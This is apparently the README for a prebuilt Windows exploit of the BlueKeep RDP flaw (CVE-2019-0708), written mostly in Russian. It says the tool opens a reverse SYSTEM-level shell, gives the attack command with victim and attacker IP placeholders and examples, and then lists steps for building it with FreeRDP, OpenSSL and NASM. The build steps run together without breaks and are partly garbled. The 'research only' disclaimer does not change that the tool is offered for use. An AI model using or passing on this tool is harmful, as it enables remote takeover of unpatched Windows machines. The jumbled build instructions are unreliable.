
CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell
Автор POC предоставлен исключительно для исследовательских целей. Если читатель использует данный POC для других действий, автор не несёт ответственности.
[toc]
CVE-2019-0708-EXP — отдельный исполняемый файл для Windows (exe), не требующий Linux, Python, Ruby и т.д. После запуска непосредственно в текущей консоли получает shell с правами System.
Сборка выполнена в режиме полной статической библиотеки, все DLL встроены; интегрированы netcat и OpenSSL; поддерживается индикатор прогресса и вывод shell.
wfreerdp.exe /v:Victim_IP /l:Attacker_IP, например wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17E:\git\KernelResearch\FreeRDP-master\openssl.7z в C:\openssl\, используя уже скомпилированную среду OpenSSLcmake-3.15.3-win64-x64.msi от имени администратораC:\Program Files\CMake\bin в переменную окружения PATH"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txtFreeRDP-master-restore.7zopenssl-1.0.2s.tar.gz в C:\openssl\ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msiC:\Perl64\bin в переменную окружения PATHperl Configure VC-WIN64Acd /d C:\openssl\ms\do_win64anmake -f ms\ntdll.maknmake -f ms\nt.maknmake -f ms\ntdll.mak testnmake -f ms\nt.mak testnasm-2.14.02-installer-x64.exe от имени администратораC:\Program Files\NASM в переменную окружения PATHnasmBuildCustomizations.rar в C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\client->common->freerdp-client в проекте, щелкните правой кнопкой мыши → «Зависимости сборки» → «Настраиваемые правила сборки», затем отметьте пункт nasm (не masm).asm файла в проекте freerdp-client в контекстном меню появится пункт «Сборка», значит среда сборки Nasm установлена успешно
Автор из ZheJiang Guoli Security Technology, электронная почта: [email protected]
nmake -f ms\ntdll.mak installnmake -f ms\nt.mak installnmake -f ms\ntdll.mak cleannmake -f ms\nt.mak cleanlibeay32.lib и ssleay32.lib в каталоге out32 и скопируйте их в C:\openssl\lib\